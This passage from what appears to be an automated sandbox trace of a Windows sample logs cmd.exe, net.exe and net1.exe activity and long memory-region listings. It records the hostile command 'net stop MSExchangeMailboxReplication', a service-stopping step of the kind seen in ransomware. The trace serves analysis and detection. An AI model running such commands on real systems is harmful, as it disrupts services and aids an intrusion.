lpConsoleTitle=0x2df4fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.953] InitializeProcThreadAttributeList (in: lpAttributeList=0x2df428, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2df40c | out: lpAttributeList=0x2df428, lpSize=0x2df40c) returned 1 [0137.953] UpdateProcThreadAttribute (in: lpAttributeList=0x2df428, dwFlags=0x0, Attribute=0x60001, lpValue=0x2df414, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2df428, lpPreviousValue=0x0) returned 1 [0137.953] GetStartupInfoW (in: lpStartupInfo=0x2df460 | out: lpStartupInfo=0x2df460*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0137.953] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0137.954] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0137.954] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0137.955] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeMailboxReplication", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x2df3b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeMailboxReplication", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2df3fc | out: lpCommandLine="net stop MSExchangeMailboxReplication", lpProcessInformation=0x2df3fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf54, dwThreadId=0xfa8)) returned 1 [0137.961] CloseHandle (hObject=0xa4) returned 1 [0137.961] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.961] GetEnvironmentStringsW () returned 0x46f9ef8* [0137.961] FreeEnvironmentStringsA (penv="=") returned 1 [0137.961] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0138.082] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x2df394 | out: lpExitCode=0x2df394*=0x2) returned 1 [0138.082] CloseHandle (hObject=0xa8) returned 1 [0138.082] _vsnwprintf (in: _Buffer=0x2df47c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2df39c | out: _Buffer="00000002") returned 8 [0138.082] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0138.082] GetEnvironmentStringsW () returned 0x46fb340* [0138.082] FreeEnvironmentStringsA (penv="=") returned 1 [0138.082] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0138.082] GetEnvironmentStringsW () returned 0x46fb340* [0138.083] FreeEnvironmentStringsA (penv="=") returned 1 [0138.083] DeleteProcThreadAttributeList (in: lpAttributeList=0x2df428 | out: lpAttributeList=0x2df428) [0138.083] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.083] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0138.083] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.083] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0138.083] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.083] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0138.083] SetConsoleInputExeNameW () returned 0x1 [0138.083] GetConsoleOutputCP () returned 0x1b5 [0138.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.083] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.084] exit (_Code=2) Thread: id = 672 os_tid = 0xfb8 Process: id = "222" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x11e3a000" os_pid = "0x960" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "221" os_parent_pid = "0xf68" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10900 start_va = 0x7f79c000 end_va = 0x7f79cfff entry_point = 0x0 region_type = private name = "private_0x000000007f79c000" filename = "" Region: id = 10901 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10902 start_va = 0x681e520000 end_va = 0x681e53ffff entry_point = 0x0 region_type = private name = "private_0x000000681e520000" filename = "" Region: id = 10903 start_va = 0x681e540000 end_va = 0x681e553fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000681e540000" filename = "" Region: id = 10904 start_va = 0x681e560000 end_va = 0x681e59ffff entry_point = 0x0 region_type = private name = "private_0x000000681e560000" filename = "" Region: id = 10905 start_va = 0x7df5ff660000 end_va = 0x7ff5ff65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff660000" filename = "" Region: id = 10906 start_va = 0x7ff6c4130000 end_va = 0x7ff6c4152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4130000" filename = "" Region: id = 10907 start_va = 0x7ff6c4156000 end_va = 0x7ff6c4156fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4156000" filename = "" Region: id = 10908 start_va = 0x7ff6c415e000 end_va = 0x7ff6c415ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c415e000" filename = "" Region: id = 10909 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10910 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10911 start_va = 0x681e520000 end_va = 0x681e52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000681e520000" filename = "" Region: id = 10912 start_va = 0x681e530000 end_va = 0x681e536fff entry_point = 0x0 region_type = private name = "private_0x000000681e530000" filename = "" Region: id = 10913 start_va = 0x681e5a0000 end_va = 0x681e5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000681e5a0000" filename = "" Region: id = 10914 start_va = 0x681e5b0000 end_va = 0x681e5b6fff entry_point = 0x0 region_type = private name = "private_0x000000681e5b0000" filename = "" Region: id = 10915 start_va = 0x681e5c0000 end_va = 0x681e5c0fff entry_point = 0x0 region_type = private name = "private_0x000000681e5c0000" filename = "" Region: id = 10916 start_va = 0x681e5d0000 end_va = 0x681e6cffff entry_point = 0x0 region_type = private name = "private_0x000000681e5d0000" filename = "" Region: id = 10917 start_va = 0x681e6d0000 end_va = 0x681e78dfff entry_point = 0x681e6d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10918 start_va = 0x681e790000 end_va = 0x681e7cffff entry_point = 0x0 region_type = private name = "private_0x000000681e790000" filename = "" Region: id = 10919 start_va = 0x681e7d0000 end_va = 0x681e7d0fff entry_point = 0x0 region_type = private name = "private_0x000000681e7d0000" filename = "" Region: id = 10920 start_va = 0x681e940000 end_va = 0x681e94ffff entry_point = 0x0 region_type = private name = "private_0x000000681e940000" filename = "" Region: id = 10921 start_va = 0x681e950000 end_va = 0x681ead7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000681e950000" filename = "" Region: id = 10922 start_va = 0x681eae0000 end_va = 0x681ec60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000681eae0000" filename = "" Region: id = 10923 start_va = 0x681ec70000 end_va = 0x682006ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000681ec70000" filename = "" Region: id = 10924 start_va = 0x7ff6c4030000 end_va = 0x7ff6c412ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4030000" filename = "" Region: id = 10925 start_va = 0x7ff6c415c000 end_va = 0x7ff6c415dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c415c000" filename = "" Region: id = 10926 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10927 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10928 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10929 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10930 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10931 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10932 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10933 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10934 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10935 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10936 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10937 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10938 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10939 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 669 os_tid = 0xf64 Thread: id = 670 os_tid = 0xf74 Thread: id = 671 os_tid = 0xfb0 Process: id = "223" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x121f6000" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "221" os_parent_pid = "0xf68" cmd_line = "net stop MSExchangeMailboxReplication" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10953 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10954 start_va = 0xc30000 end_va = 0x4c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 10955 start_va = 0x4c30000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 10956 start_va = 0x4c50000 end_va = 0x4c51fff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 10957 start_va = 0x4c60000 end_va = 0x4c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 10958 start_va = 0x4c80000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 10959 start_va = 0x4cc0000 end_va = 0x4d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 10960 start_va = 0x4d40000 end_va = 0x4d43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d40000" filename = "" Region: id = 10961 start_va = 0x4d50000 end_va = 0x4d50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d50000" filename = "" Region: id = 10962 start_va = 0x4d60000 end_va = 0x4d61fff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 10963 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10964 start_va = 0x7f3c0000 end_va = 0x7f3e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3c0000" filename = "" Region: id = 10965 start_va = 0x7f3e3000 end_va = 0x7f3e3fff entry_point = 0x0 region_type = private name = "private_0x000000007f3e3000" filename = "" Region: id = 10966 start_va = 0x7f3ec000 end_va = 0x7f3eefff entry_point = 0x0 region_type = private name = "private_0x000000007f3ec000" filename = "" Region: id = 10967 start_va = 0x7f3ef000 end_va = 0x7f3effff entry_point = 0x0 region_type = private name = "private_0x000000007f3ef000" filename = "" Region: id = 10968 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10969 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10970 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10971 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10972 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10973 start_va = 0x4e80000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 10974 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10975 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10976 start_va = 0x4d70000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 10977 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 673 os_tid = 0xfa8 Thread: id = 674 os_tid = 0xfb4 Process: id = "224" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x13335000" os_pid = "0xf6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "223" os_parent_pid = "0xf54" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMailboxReplication" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10978 start_va = 0x520000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 10979 start_va = 0x540000 end_va = 0x541fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 10980 start_va = 0x550000 end_va = 0x563fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 10981 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 10982 start_va = 0x5b0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 10983 start_va = 0x630000 end_va = 0x633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 10984 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 10985 start_va = 0x650000 end_va = 0x651fff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 10986 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10987 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10988 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10989 start_va = 0x7f370000 end_va = 0x7f392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f370000" filename = "" Region: id = 10990 start_va = 0x7f399000 end_va = 0x7f39bfff entry_point = 0x0 region_type = private name = "private_0x000000007f399000" filename = "" Region: id = 10991 start_va = 0x7f39c000 end_va = 0x7f39cfff entry_point = 0x0 region_type = private name = "private_0x000000007f39c000" filename = "" Region: id = 10992 start_va = 0x7f39f000 end_va = 0x7f39ffff entry_point = 0x0 region_type = private name = "private_0x000000007f39f000" filename = "" Region: id = 10993 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10994 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10995 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10996 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10997 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10998 start_va = 0x780000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 10999 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11000 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11001 start_va = 0x950000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 11002 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11003 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 11004 start_va = 0x530000 end_va = 0x533fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11005 start_va = 0x660000 end_va = 0x71dfff entry_point = 0x660000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11006 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 11007 start_va = 0x790000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 11008 start_va = 0x870000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 11009 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11010 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11011 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11012 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11013 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11014 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11015 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = 